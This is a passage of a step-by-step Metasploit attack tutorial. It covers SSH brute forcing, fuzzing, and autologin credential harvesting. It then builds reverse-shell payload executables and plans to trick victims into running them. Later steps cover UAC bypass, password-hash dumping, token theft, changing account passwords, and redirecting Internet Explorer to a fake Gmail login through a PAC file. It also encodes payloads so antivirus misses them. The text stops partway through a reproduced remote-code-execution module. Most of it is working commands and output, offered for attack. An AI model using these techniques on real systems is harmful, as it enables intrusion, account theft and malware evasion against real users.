Contents

Introduction ............................................................................................................................................................................... 3
1. AUXILIARY .............................................................................................................................................................................. 4
1.a Scanners ........................................................................................................................................................................... 4
1.b Fuzzers ............................................................................................................................................................................. 7
1.c Credential harvesting ..................................................................................................................................................... 11
2. POST EXPLOITATION ............................................................................................................................................................ 14
2.a privilege escalation ........................................................................................................................................................ 14
2.b IE proxy PAC ................................................................................................................................................................... 26
3. MISCELLANEOUS .................................................................................................................................................................. 34
3.a NOP generator ............................................................................................................................................................... 34
3.b encoders ........................................................................................................................................................................ 37
4. Advanced module/payload configuration options .............................................................................................................. 40
5. Writing custom Metasploit modules. .................................................................................................................................. 43
6. Stealthy techniques when using Metasploit. ....................................................................................................................... 48
Advanced Metasploit 3

Introduction
Metasploit is an open source application for security that was created by HD in 2003. Many exploits are contained in
Metasploit, because Metasploit has a framework, which allows any user access to any modules desired. Metasploit has
the architecture shown below:

F IGURE 1: METASPLOIT ARCHITECTURE

At this time, I will explain how to use Metasploit to take over a computer by scanning SSH and then performing
BRUTEFORCE to find the username and password. I will also show how to perform FUZZING. Here I will also explain how
one can use ENCODER techniques to create a Trojan that is undetected by antivirus. I will also explain how a person can
use fake login techniques for credential harvesting. In addition, I will show how, when you have entered the target com-
puter, you can manipulate several processes with stealthy techniques when using Metasploit, taking the user token on the
target computer, changing the username and password, etc., and injecting it with techniques of privilege escalation. Final-
ly, I will I explain how to create a custom module on Metasploit and use NOP sled to make your exploits stable, and how
someone using PROXYPAC can steal your bank account.
Advanced Metasploit 4

1. AUXILIARY
AUXILIARY is a collection of modules that do not use a payload. Functions of the auxiliary modules include port scanning,
fingerprinting, service scanners, etc. Auxiliary modules also include several different types of protocols, such as scanners,
network protocol fuzzers, wireless, and denial of service.

1.a Scanners
This module, contained in auxiliary, scans to find the information on targets ranging from open ports to even identifying
the OS in use by the target. See the illustrations below:

F IGURE 2: SSH BRUTEFORCE

The illustration shows how an attacker gains access at a company that provides Wi-Fi to visitors.
This module has several features to scan applications such as DCERPC, Discovery, FTP, HTTP, IMAP, MSSQL, MySQL, Net-
BIOS, POP3, SMB, SMTP, SNMP, SSH, Telnet, TFTP, VMWare, and VNC. For this article, Im scanning SSH, using the auxiliary
SSH module to scan and using brute force for the username and password. To get started, type msfconsole on the termi-
nal.
root@sungai:~# msfconsole

F IGURE 3: S TARTING METASPLOIT

Advanced Metasploit 5

After Metasploit loads, I use the module ssh_login with the following command:
msf > use auxiliary/scanner/ssh/ssh_login
Then I set the target to be scanned with the command:
msf auxiliary(ssh_login) > set RHOSTS 192.168.109.132
RHOSTS => 192.168.109.132

F IGURE 4: SETTING IP TARGET

After I use the ssh_login module, I must have a dictionary to brute-force the SSH login. To perform user configuration and
pass list using the existing dictionary, I use the following command:
msf auxiliary(ssh_login) > show options

F IGURE 5: SEE THE COMMAND FOR SETTING DICTIONARY

I then use USERPASS_FILE options for setting the dictionary list:
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/Metasploit-
framework/data/wordlists/root_userpass.txt
Advanced Metasploit 6

F IGURE 6: SETTING USERPASS_FILE

After setting wordlists to be used for brute force, I run that module with this command:
msf auxiliary(ssh_login) > run
Note: The more userpass wordlists are used, the longer the process.
Results of the scanning SSH will look more or less like the following image.

F IGURE 7: S TARTING BRUTE FORCE SSH

You can see that the results are as shown below:
[*] 192.168.109.1:22 SSH - Starting brute force
[*] Command shell session 2 opened (192.168.109.130:53371 -> 192.168.109.1:22)
at 2015-08-30 03:24:14 -0400
[+] 192.168.109.1:22 SSH - [01/52] - Success: 'cupenkz':'it-trad.com'
'uid=1001(cupenkz) gid=1003(cupenkz) groups=1003(cupenkz) con-
text=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 Linux lo-
calhost.localdomain 3.19.2-201.fc21.x86_64 #1 SMP Tue Mar 24 03:08:23 UTC 2015
x86_64 x86_64 GNU/Linux '
IP Target 192.168.109.1, Port 22, has a user access name cupenkz with password it-trad.com. After getting the target,
the following command can be used to do the checking:
msf auxiliary(ssh_login) > sessions -i

Note:
-i is the command for interacting with ID number
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
Advanced Metasploit 7

2 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:53371 -> 192.168.109.1:22 (192.168.109.1)

3 shell linux SSH cupenkz:it-trad.com (192.168.109.1:22) 192.168.109.130:36248 -> 192.168.109.1:22 (192.168.109.1)

F IGURE 8: RESULT OF SSH BRUTEFORCE

After the session begins, you can directly interact with the target using the command:
msf auxiliary(ssh_login) > sessions -i 2
Note:
-i is the command for interact with ID number
The purpose of the command is to run session number 2.

F IGURE 9: RUNNING SESSION 2

After you get shell on the target, you only have access as a user, but you could gain root access if you know the vulnerabil-
ity in the OS.

1.b Fuzzers
Fuzzing is a technique in which an attacker exploits the weaknesses of an application that is used by the target. Usually
these weaknesses could cause the target to crash, which can even provide access into the target terminal. In Metasploit,
Advanced Metasploit 8

there are several modules that can be used for such an application, including DNS, FTP, SSH, HTTP, SMB, SMTP, and TDS.
However, not all versions of these applications be attacked using a fuzzer module contained in Metasploit.
This technique is illustrated below:

F IGURE 10: I LLUSTRATION OF FUZZING SSH

The illustration shows that, if a company has Wi-Fi access, it can be accessed by others and abused. Attackers can scan the
companys computers. In addition, if the company has a vulnerability in its SSH application, SSH on its computers can be
targeted to cause a crash.
To start fuzzing, you must run Metasploit first with the command:
root@sungai:~# msfconsole

F IGURE 11: RUNNING METASPLOIT

After Metasploit runs, use the command below to run the SSH fuzzer.
msf > use auxiliary/fuzzers/ssh/ssh_version_corrupt
msf auxiliary(ssh_version_corrupt) >
However, before using the ssh fuzzer module, maybe we should scan the target first, using the nmap simply to ascertain
whether the target is using SSH or not. I use the command:
root@sungai:~# nmap -sS -v -A 192.168.109.1
Note:
-sS is the command for scanning the TCP SYN packet
Advanced Metasploit 9

-v is the command for verbose (resulting in detailed scanning)

-A is the command for detecting the OS used, version, script scanning, and traceroute
Results of the scan are shown below:

F IGURE 12: HASIL SCANNING NMAP

You can see from the picture that the IP 192.168.109.1 is using OpenSSH, version 6.6.1, with port 22 open.
After viewing the information that is used by the SSH module fuzzer, you can use the command:
msf auxiliary(ssh_version_corrupt) > info
The following information can be seen:
MAXDEPTH specifications for testing on the target byte
RHOST is an IP target
RPORT is a port target.
Before running the SSH module fuzzer, I have to apply the settings for the MAXDEPT and RHOST as follows:
Advanced Metasploit 10

F IGURE 13: SETTING MAXDEPTH AND RHOST SSH FUZZER

The picture above shows the settings for the specification of bytes sent, the target IP, and the target port.
To perform settings, use the command:
msf auxiliary(ssh_version_corrupt) > set maxdepth 999999999999
maxdepth => 999999999999
msf auxiliary(ssh_version_corrupt) > set rhost 192.168.109.1
rhost => 192.168.109.1
After the settings are correct, you can run with this command:
msf auxiliary(ssh_version_corrupt) > run

F IGURE 14: SSH FUZZER RUNNING

Advanced Metasploit 11

The picture above shows Metasploit using fuzzing against the target, but not all versions of SSH have this vulnerability. So,
if SSH in the target does not crash, there is the possibility that SSH is already in the patch.

1.c Credential harvesting

Credential harvesting is a social engineering technique that is used to get a user and password for user login, SSH, and
others. This technique has many variations through which an attacker can create a payload to get a username/password
login and other information. An illustration of credential harvesting is shown below.

F IGURE 15: CREDENTIAL HARVESTING

The image above shows that the attacker can retrieve user and password targets using AutoLogin if the target has Auto-
Login settings.
First, we must have access to a computer target for use in the credential harvesting technique.
I gain access using Meterpreter, as shown below:

F IGURE 16: METERPRETER C ONNECTED

After connecting with Meterpreter, I run Meterpreter as a background service. Then I search the credential module using
the following command:
msf exploit(handler)> search credential

F IGURE 17: SEARCHING CREDENTIAL MODULE

In Metasploit, there are many module credentials, but I use the module
post/windows/gather/credentials/windows_autologin. To access this module, I use the following command:
msf exploit(handler)> use post/windows/gather/credentials/windows_autologin
Advanced Metasploit 12

F IGURE 18: USING MODULE POST/WINDOWS /GATHER / CREDENTIALS /WINDOWS _AUTOLOGIN

After that, I can see more options in this module with the command:
msf post(windows_autologin)> show options

F IGURE 19: S HOWING OPTION MODULE WINDOWS _AUTOLOGIN

The above picture shows an option contained in the module. Here I am just setting part of the session, which is used with
the command:
msf post(windows_autologin)>sessions -i

F IGURE 20: SEEING SESSION ACTIVE IN TARGET

msf post(windows_autologin)> set sessions 1

F IGURE 21: SETTING SESSION ON MODULE WINDOWS AUTO LOGIN

After setting the module, I run this module with the command:
Advanced Metasploit 13
msf post(windows_autologin)> exploit

F IGURE 22: E XPLOIT RUNNING

The illustration shows how the exploit reveals the password and username information contained on the target computer:
user: cupenkz
password [No Password!]
Domain: FATBOYGAG-SLIM
When the target computer does not have a set auto login, the exploit does not work and shows something like the image
below:

F IGURE 23: E XPLOIT NOT WORKING

Advanced Metasploit 14

2. POST EXPLOITATION
Another technique that the attacker can use to gain further access to the target's internal network is packet sniffing. An
attacker can also put a backdoor to retain access to the target.

2.a privilege escalation

This technique allows an attacker to take over the target computer by taking advantage of an exposed vulnerability. Once
the computer is taken over, the attacker tries to raise user access, as in the following illustration:

F IGURE 24: PRIVILEGE ESCALATION

In this example, my target is Windows 7 Ultimate 32 bit. To do the scanning to find the OS used, I use the command:
root@sunga : nmap sS v A 192.168.130.1

F IGURE 25: SCANNING USE NMAP

Note:
-sS is the command for scanning by using the TCP SYN packet
-v is the command for verbose (resulting in detail scanning)
-A is the command for detecting the OS used, version, script scanning, and traceroute
The results are as shown below.
Advanced Metasploit 15

F IGURE 26: T HE RESULT FROM SCANNING USE NMAP

To perform privilege escalation, I first made the application form execute the payload; then the target will be connected
with a computer attacker. I use msfpayload with the command:
sungati@root : msfpayload windows/Meterpreter/reverse_tcp
LHOST=192.168.130.128 LPORT=4444 x > /var/www/cupenkz.exe

F IGURE 27: L OADING MSFPAYLOAD TO MAKE A MALICIOUS FILE

Note:
- Msfpayload command creates a payload using reverse_tcp
- LHOST is an IP attacker
- LPORT is a computer port attacker
- X command creates an exe file named cupenkz.exe
After making the application payload, you need to trick the unsuspecting targets in order to use the payload silently, such
as by combining it with a program like crack or install autoscript usb, which is useful when installed in the target computer;
then the application will run. In this case, I just give an example of how best to move so that the application is executed
with the target.
After that, I run the exploit handler on a computer attacker, with the command:

F IGURE 28: USING EXPLOIT/MULTI/ HANDLER IN COMPUTER ATTACKER

Advanced Metasploit 16

The function of the above command is that, when cupenkz.exe is executed with a target computer, the attacker computer
is ready to receive the payload and open a reverse connection from the target computer.

F IGURE 29: RUNNING EXPLOIT HANDLER AND THE TARGET 192.168.130.1 CONNECTED FOR RUNNING THE PROGRAM CUPENKZ .EXE
After setting the LHOST attacker on the computer, I run the command:
msf exploit(handler) > run
Then, when one of the files that we uploaded earlier (cupenkz.exe) is executed by the target, it will look like the image
above.
The above-owned user access is usually limited to the user, not the administrator or root.

F IGURE 30: A CCESS IS DENIED

I tried to do getsystem when it was targeted with the command:
Meterpreter > getsystem

F IGURE 31: GETSYSTEM FAIL

The above condition is that we have only limited access to user, and cannot access to the system; I view it with the com-
mand:
Meterpreter > getuid
Advanced Metasploit 17

F IGURE 32: T HE POSITION OF THE CURRENT USER

After that, I review the information contained in getsystem with the command:
Meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t <opt> The technique to use. (Default to 0).
0. All techniques available
1. Service - Named Pipe Impersonation (In Memory/Admin)
2. Service - Named Pipe Impersonation (Dropper/Admin)
3. Service - Token Duplication (In Memory/Admin)
There are three functions that are used to increase user access to a target computer, among others.
The first function is 1. Service - Named Pipe Impersonation (In Memory/Admin), where the attacker does the exploit on
the target computer, usually as a local exploit. Local exploits are used to take over the target computer in full. I first run
Meterpreter as background, with the command:

F IGURE 33: RUNNING METERPRETER AS BACKGROUND

msf exploit(handler) > search uac
Advanced Metasploit 18

F IGURE 34: SEARCHING MODULE LOCAL EXPLOIT BYPASSUAC

msf exploit(handler) > use/exploit/windows/local/bypassuac
Above Im searching a Windows 7 computer with the local exploit with the name bypass UAC, and then I set the session on
a local exploit.

F IGURE 35: SETTING SESSION

msf exploit(bypassuac) > set SESSION 2
After the setting session is complete, I run the exploit locally with the command:
msf exploit(bypassuac) > exploit
Advanced Metasploit 19

F IGURE 36: RUNNING BYPASSUAC EXPLOIT LOCAL W INDOWS 7

Session 2 has been created by using local exploit bypassuac to replace the session with the command:
msf exploit(bypassuac) > sessions -i
msf exploit(bypassuac) > sessions i 2

F IGURE 37: CHANGING SESSION

msf exploit(bypassuac) > sessions -i 2
After running this, I will try to identify whether user access is no longer restricted.

F IGURE 38: A CCESS BY USING GETSYSTEM

The picture above shows where the system is created using a local exploit. Here I took over the account system; in other
words, the root account. If you have the root account, then you can take over the entire contents of the target computer.
Advanced Metasploit 20

UAC (user account control) is a security feature in Windows. Each function that appears to be accessing files or applica-
tions on a Windows system will display a warning from UAC asking for confirmation as a security feature. This feature can
be deactivated (disabled) so you are not disturbed by the frequent Windows question, "Do you want to allow the follow-
ing program to install software on this computer?"

UAC/user account control is a technology and security infrastructure introduced with Microsofts Win-
dows Vista and Windows Server 2008 operating systems, with a more relaxed[1] version also present in
Windows 7 and Windows Server 2008 R2. It aims to improve the security of Microsoft Windows by limit-
ing application software to standard user privileges until an administrator authorizes an increase or ele-
vation. In this way, only applications trusted by the user may receive administrative privileges, and mal-
ware should be kept from compromising the operating system. In other words, a user account may have
administrator privileges assigned to it, but applications that the user runs do not inherit those privileges
unless they are approved beforehand or the user explicitly authorizes it.
Why do we need an exploit to bypass UAC? The exploit is a technique by which we can take over the targeted computer.
There are two types of exploit attacks, namely remote and local. Usually a remote exploit is used when an application on
the target has a vulnerability that can be accessed remotely (via the port connection). In this example, we use SSH, FTP,
etc. A local exploit usually finds the cracks in the application contained on the targeted computer. See the illustration be-
low.

F IGURE 39: REMOTE E XPLOIT

The figure shows a remote exploit, with the attacker scanning SSH on the target and finding a SSH vulnerability. Then the
attacker can attack using a remote SSH exploit.

F IGURE 40: L OCAL EXPLOIT

The illustration shows the attacker performing remote ssh in the open and seeing that the target computers UAC feature
can be bypassed, so the user privileges can be raised, and the attacker uses the local exploit bypassuac on the target com-
puter. This shows the difference between a local exploit and a remote exploit.
Bypass UAC is a technique that raises the standard user access rights to be an administrator without requiring authoriza-
tion from the target. In this example, I used the payload bypassUAC on Metasploit. This technique will create an executa-
ble file and find the Windows directory to which to upload it. Then the file is injected and, if the file is executed, it will
change the permissions of the user to be an administrator. An illustration can be seen in the figure below:
Advanced Metasploit 21

F IGURE 41: B YPASS UAC

The illustration shows approximately how UAC is bypassed:
1. Meterpreter connectattacker must have a connection to the target through Meterpreter.
2. Upload maliciousattacker creates a malicious file using bypassuac, then uploads it to the target computer and
puts it in a specific directory on system target.
3. Execute fileattacker executes files that have been created earlier.
4. Create session for Meterpretermalicious file creates a session that is integrated through Meterpreter.
The second function is 2. Service - Named Pipe Impersonation (Dropper / Admin)
While the above function is aimed at a file system on the target computer, here I use Windows API with railgun, which is
one of the applications contained in Metasploit. Railgun is an application that can interact and gain full access using Win-
dows API.
For information contained in the Windows API documentation on the website, you can look at msdn.microsoft.com, be-
cause I am not going to explain much here about the API function in Windows.
Here I use an IRB shell to run railgun, with the command:
Meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the Meterpreter client
After that, I see what DLLs are used in this module that already exist in railgun, with the command:
>> client.railgun.known_dll_names
=> ["kernel32", "ntdll", "user32", "ws2_32", "iphlpapi", "advapi32",
"shell32", "netapi32", "crypt32", "wlanapi", "wldap32", "version"]
>>

F IGURE 42: DLLS USED IN RAILGUN

The above are the default 12 DLLs that can be used in railgun; here I use netapi32 to change user admin on the target
computer.
First, I must check what user is already present on the target with the command:
Meterpreter > hashdump
ad-
min:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::
Advanced Metasploit 22
Administra-
tor:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cu-
penkz:1004:aad3b435b51404eeaad3b435b51404ee:ebb51400c232862211db317da0793bc9:::
fat-
boygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Updatu-
sUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

F IGURE 43: CUPENKZ USER PASSWORD BEFORE CHANGING EBB 51400 C 232862211 DB 317 DA0793 BC 9
The above shows six users who are on the target computer; now I'll try change the password cupenkz using the following
command:
>> client.railgun.netapi32.NetUserChangePassword(nil, "cupenkz", "cupenkz",
"cupenkz123")
Note:
- client.railgun.netapi32.NetUserChangePassword <= command to use neta-
pi32.dll and use the function NetUserChangePassword
- nil <= domainname
- cupenkz <== username
- cupenkz <== oldpassword
- cupenkz123 <== newpassword

F IGURE 44: COMMAND NET USER CHANGEPASSWORD , NETAPI 32 SUCCESSFULLY

To check if the cupenkz password has been replaced or not, I checked with the command:
Meterpreter > hashdump
Advanced Metasploit 23
ad-
min:1003:aad3b435b51404eeaad3b435b51404ee:3008c87294511142799dca1191e69a0f:::
Administra-
tor:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cu-
penkz:1004:aad3b435b51404eeaad3b435b51404ee:cd84df77d079b66945e777398b4d4937:::
fat-
boygagslim:1000:aad3b435b51404eeaad3b435b51404ee:7398d3b8ece0f71589fbfa3d3c54480f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Updatu-
sUser:1001:aad3b435b51404eeaad3b435b51404ee:0d7025661596df7289a35b32f20b4bb8:::

F IGURE 45: CUPENKZ PASSWORD HAS BEEN REPLACED TO BECOME CD 84 DF 77 D 079B 66945E 777398B 4 D4937

You can see the cupenkz password before is cd84df77d079b66945e777398b4d4937; the password that was changed ear-
lier is ebb51400c232862211db317da0793bc9.
For more details, I look at the functions that are on netapi32.dll in this directory:
root@sungai:cd /usr/share/Metasploit- frame-
work/lib/rex/post/Meterpreter/extensions/stdapi/railgun/def
root@sungai:/usr/share/Metasploit- frame-
work/lib/rex/post/Meterpreter/extensions/stdapi/railgun/def# less
def_netapi32.rb
see function NetUserChangePassword
dll.add_function('NetUserChangePassword', 'DWORD', [
["PWCHAR","domainname","in"],
["PWCHAR","username","in"],
["PWCHAR","oldpassword","in"],
["PWCHAR","newpassword","in"]
])
Above is a function that allows the user to change the password using railgun with netapi32.dll. After you change the user,
you can only login using RDP. This technique could possibly be used when you are a user/guest, but you want to get more
access to the admin/root; then you can just replace the users, or create new functions to be added as admin.
Advanced Metasploit 24

For the third function 3: Service - Token Duplication (In Memory/Admin), which involves stealing the token in the system, I
am using an application on Metasploit incognito to steal the token on the target system. Use the command:
Meterpreter > use incognito
Loading extension incognito...success.
Meterpreter >

F IGURE 46: USING INCOGNITO

Then I check the username used in this Meterpreter, with the command:
Meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Now I see in list_token anything contained on the system with the command:
Meterpreter > list_tokens -u
Delegation Tokens Available
========================================
fatboygag-slim\fatboygagslim
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
fatboygag-slim\UpdatusUser
NT AUTHORITY\ANONYMOUS LOGON
Advanced Metasploit 25

F IGURE 47: LISTING TOKENS USED IN TARGET

Note:
-u command for see list token
There are two tokens, DELEGATION and IMPERSONATION. DELEGATION is a token that can interact using the remote, but
it is not permanent, unlike the IMPERSONATION token.
After that, I would choose the token using the command:
Meterpreter > impersonate_token
Usage: impersonate_token <token>
Instructs the Meterpreter thread to impersonate the specified token. All oth-
er actions will then be made in the context of that token.
Hint: Double backslash DOMAIN\\name (Meterpreter quirk)
Hint: Enclose with quotation marks if name contains a space
Meterpreter >

F IGURE 48: IMPERSONATE _TOKEN

Here I will try to use the user token "fatboygag-slim fatboygagslim \\", with the command
Meterpreter > impersonate_token fatboygag-slim\\fatboygagslim
[+] Delegation token available
Advanced Metasploit 26

[+] Successfully impersonated user fatboygag-slim\fatboygagslim

F IGURE 49: IMPERSONATE _TOKEN SUCCESSFULLY

To check whether the token has been successfully used, I use the command:
Meterpreter > getuid
Server username: fatboygag-slim\fatboygagslim

F IGURE 50: IMAGE GETUID TOKEN SUCCESSFULLY

From the above explanation, we see that, when we are connected to the target, then we can use the existing user token
on the computer by using incognito.

2.b IE proxy PAC

This is a technique in which the attacker can insert a fake login on a website by performing exploitation on IE so that,
when the target is open on the web, the password will be captured by the attacker, as shown below.

F IGURE 51: IE PROXY PAC

To run this technique, you should already have access to the target computer. Here, I use Meterpreter on the target using
the exploit me08_067_netapi, as shown in the following illustration:
Advanced Metasploit 27

F IGURE 52: METERPRETER USING EXPLOIT ME 08_067_NETAPI

After I have opened the target with Meterpreter, I look for the ie_proxypac exploit with this command:
msf exploit(ms08_06_netapi) > search ie_proxy

F IGURE 53: SEARCHING IE _PROXY MODULE

After searching, there is one module for ie_proxy, and then I use the command:
msf exploit(ms08_06_netapi) > use post/windows/manage/ie_proxypac
Advanced Metasploit 28

F IGURE 54: INFO MODULE IE _PROXYPAC

The picture above shows a brief description of the module ie_proxypac. To run the module, I see the first option is to look
at at the previous settings. I use the command:
msf post(ie_proxy) > show options

F IGURE 55: OPTION MODULE IE _ PROXYPAC

In the module above, there are five options that must be set, but for AUTO DETECT and DISABLE PROXY Im using the de-
fault. For the REMOTE_PAC, the setting will load a .pac file on remote, and LOCAL_PAC is a setting where there is a .pac
file on the computer attacker, which is a previously made .pac file on the local computer. I put the path
/var/www/cupenkz.pac .pac file to fill the .pac file, as shown below:
Advanced Metasploit 29

F IGURE 56: CONTENT FILE CUPENKZ .PAC

The picture above shows a .pac file that will open www.gmail.com and the target computer will be redirected to the IP
192.168.109.130. The IP is already in post fake login.
After that, I did the setting for LOCAL_PAC with the command:
msf post(ie_proxy) > set LOCAL_PAC /var/www/cupenkz.pac

F IGURE 57: SETTING LOCAL_PAC

After setting the file .pac , I set a SESSION number on which to run the file. However, before that I check that SESSION is at
the target using the command.
msf post(ie_proxy) > sessions -i
Note:
-i is the command for interact with ID number
Advanced Metasploit 30

F IGURE 58: CHECKING A CTIVE SESSION

A session can be active only once; after that, do the settings with the command:
msf post(ie_proxy) > set SESSIONS 1
Note:
-i is the command for interacting with the ID number

F IGURE 59: SETTING SESSION U SE NO 1

After all the settings are done, then run the command:
msf post(ie_proxy) > exploit

F IGURE 60: RUNNING IE _PROXYPAC

The picture above shows the information that the .pac file from the local computer will upload to the target computer
with the following command:
C:\Documents and settings\NetworkService\Application Data\hFTVnk.pac
Advanced Metasploit 31

To ascertain whether the .pac file has been set on the target computer, I check the target. I open IE, chose menu Internet
Options, and select the option as shown below.

F IGURE 61: INTERNET OPTION IE

After that, I choose Connection and LAN setting

The result obtained can be seen in the following settings.

Advanced Metasploit 32

F IGURE 62: SETTING IE INTERNET OPTION

The picture above shows setting the proxypac on IE, where the file hFTVnk.pac is configured as the IE proxy pac. To verify
whether the file proxy is mounted, run IE and open www.gmail.com, as shown below:

F IGURE 63: D ISPLAYING IE ON TARGET WHEN IT OPENS WWW .GMAIL. COM

Advanced Metasploit 33

To better ascertain whether hF Vnk.pac is loaded or not, I use View Source and look for the link authentication used, as
shown below:

F IGURE 64: VIEWING S OURCE PROXYPAC

As can be seen, www.gmail.com is the link that is opened in IE, because the attached file authentication cupenkz.html, if
there is a login it, will immediately redirect to www.mail.google.com.
The advantage of using this technique is the URL address to the web browser is almost similar to the original, so it is less
likely to be suspected.
Advanced Metasploit 34

3. MISCELLANEOUS
A function of this technique is bypassing security contained in the target. As a small example, it can bypass antivirus and
IDS (instruction detecting system).

3.a NOP generator

NOP (no operation) is a technique by which NOP commands are used to add some bytes to the exploit payload. The func-
tion of adding bytes is to solve the problem of finding the original EIP address of a buffer, effectively increasing the target
area.
As an example from everyday life is a glass that can be filled with 500ml of water. If we fill it with 501ml water, the water
will be spilled out of the glass. Similarly, with the buffer-overflow technique, an application that can store 500 bytes of
data is filled with 501 bytes, causing it to crash. Think of it this way: After the fuzzing finds that the EIP application lies in
510 bytes and the shellcode contains 100 bytes, it is possible to add 410 bytes of NOPs.
For an illustration of how NOP works, see the diagram below:

F IGURE 65: NOP WORKING

The above illustration shows how NOP works: NOP makes a jump to the next address so that the end of the NOP com-
mand calls the shellcode.
For using the NOP Generator, you must already know the NOP module contained in Metasploit.
root@sungai:~# msfconsole
Advanced Metasploit 35

F IGURE 66: S TART METASPLOIT

Here I will make a NOP sled using payload/windows/shell_bind_tcp, with the command:
msf > use payload/windows/shell_bind_tcp

F IGURE 67: USE SHELL _BIND _TCP PAYLOAD

As can be seen from the picture above, shell_bind_tcp can make a connection back from the target when the target exe-
cutes the payload, and then the target will be connected to the computer attacker using attacker port 4444. To execute
the payload, use the command below:
msf payload (shell_bind_tcp) > generate
Advanced Metasploit 36

F IGURE 68: GENERATE PAYLOAD

It can be seen from the results that the payload generated little endian or so-called shellcode that totals 341 bytes. Here is
a NOP function can add value to the shellcode. To try it out, can use the command.
msf payload (shell_bind_tcp) > generate -s 14
Note:
-s is the command to add how many bytes on NOP
Advanced Metasploit 37

F IGURE 69: GENERATE USE -S NOP SLED

The shellcode, as can be seen from the above, now contains 355 bytes. The -s command 14 adds a NOP sled of 14 bytes
to the shellcode. The function of the NOP sled is the same thing that I illustrated by the water in a glass. If the shellcode
does not crash the application being fuzzed, the NOP sled is one way in which values can be added to exploit the shellcode
running.

3.b encoders
This is a technique that is used to bypass anti-virus or IDS/IPS. It is usually used by someone to create a Trojan and is not
detected by anti-virus software.
At this time, I will make a payload.exe using msfvenom with the command:
root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp
LHOST=192.168.109.130 LPORT=6969 -x -f exe >
/root/Desktop/cupu.exe
Note:
-p is the command to choose the payload used
-x is the command to specify a custom executable file to use as a template
-f is the command for an output format file to be produced

F IGURE 70: CREATE FILE CUPU .EXE

You can see in the picture above that msfvenom makes a file with the name cupu.exe by using the payload win-
dows/Meterpreter/reverse_tcp and, if this file is executed in the target, the target will be connected to the attacker's IP
192.168.109.130 using Port 6969.
Advanced Metasploit 38

Here I will check the cupu.exe file by using www.virustotal.com:

F IGURE 71: RESULT SCANNING CUPU .EXE

The illustration above shows that the cupu.exe file is detected by three antivirus programs out of 56. However, here I am
trying to encode the cupu.exe file to cupenkz.exe to be undetected by AV software. Use the command:
root@sungai : ~# msfvenom -p windows/Meterpreter/reverse_tcp
LHOST=192.168.109.130 LPORT=6969 -x -f exe -e
x86_shikata_ga_nai> /root/Desktop/cupenkz.exe
Note:
-p is the command for choosing what payload is used
-x is the command for specifying a custom executable file to use as a tem-
plate
-f is the command for output format file, yang akan di hasilkan
-e is the command for choosing the encryption you want to be used

To the above command, I add the encode options -e x86_shikata_ga_nai, and the results of the cupenkz.exe file on scan-
ning www.virustotal.com, as shown below.
Advanced Metasploit 39

F IGURE 72: RESULT S CANNING FILE CUPENKZ .EXE AT VIRUSTOTAL . COM

The picture above shows that the cupenkz.exe file as completely undetectable by antivirus software, using shikata_ga_nai
encoding.
Advanced Metasploit 40

4. Advanced module/payload configuration options

These are techniques whereby, when we're loading a module, we can set parameters in advance, by which I mean that it
can automatically make an order in the attack. For example, use this command:
msf auxiliary (ssh_login) > show advanced

F IGURE 73: SETTING SHOW ADVANCED MODULE SSH _ LOGIN

The above is an advanced setting for auxiliary ssh_login scanners; it can be seen that there are some settings and also a
description. To change the settings, use the command:
msf auxiliary (ssh_login) > set Name CurrentSetting
example:
msf auxiliary (ssh_login) > set autorunscript /post/linux/gather/enum_config

F IGURE 74: CHANGE SETTING AN AUTORUNSCRIPT

enum_conf command is to take some of the configuration information contained on target; to check whether the setting
has been changed or not , use a command like this:
msf auxiliary (ssh_login) > show advanced
Advanced Metasploit 41

F IGURE 75: AUTORUNSCRIPT SETTING HAS BEEN CHANGED

You can see in the picture above that the setting for AutoRunScript has turned into post/linux/gather/enum_config. This
affects the actual setting when you want to attack with their own methods, because usually this method depends on the
situation and conditions in the field.
AutoRunScript can be seen from the results of the run, as shown below:

F IGURE 76: RESULT FROM AUTORUNSCRIPT

The picture above shows that the OS used by the target is Fedora 21 and there is some log information that has been
stored on the computer attacker. By using AutoRunScript, you can make an attack and obtain the information contained in
the target. Examples of the information obtained are shown below.
Advanced Metasploit 42

F IGURE 77: RESULT LOG FROM AUTORUNSCRIPT

The picture above shows the results log on Samba configuration, and shows where the log files are stored by the comput-
er attacker.
Advanced Metasploit 43

5. Writing custom Metasploit modules.

Writing custom Metasploit modules allows you to create your own module and load it into Metasploit. However, to make
the module, you should understand the programming language Ruby. Here I have an example exploit that I took from ex-
ploit-db.com:

F IGURE 78: E XPLOIT FROM EXPLOIT - DB .COM

The source above is made by w3tw0rk, who made an exploit by utilizing the vulnerability of applications Pitbul IRC Bot.
Here's the source:
_________________________________________________snip_______________________________________________
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'w3tw0rk / Pitbul IRC Bot Remote Code Execution',
'Description' => %q{
This module allows remote command execution on the w3tw0rk / Pitbul IRC
Bot.
},
'Author' =>
[
'Jay Turla'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '120384' ],
[ 'EDB', '36652' ]
],
'Platform' => %w{ unix win },
Advanced Metasploit 44
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 300, # According to RFC 2812, the max length message is 512,
including the cr-lf
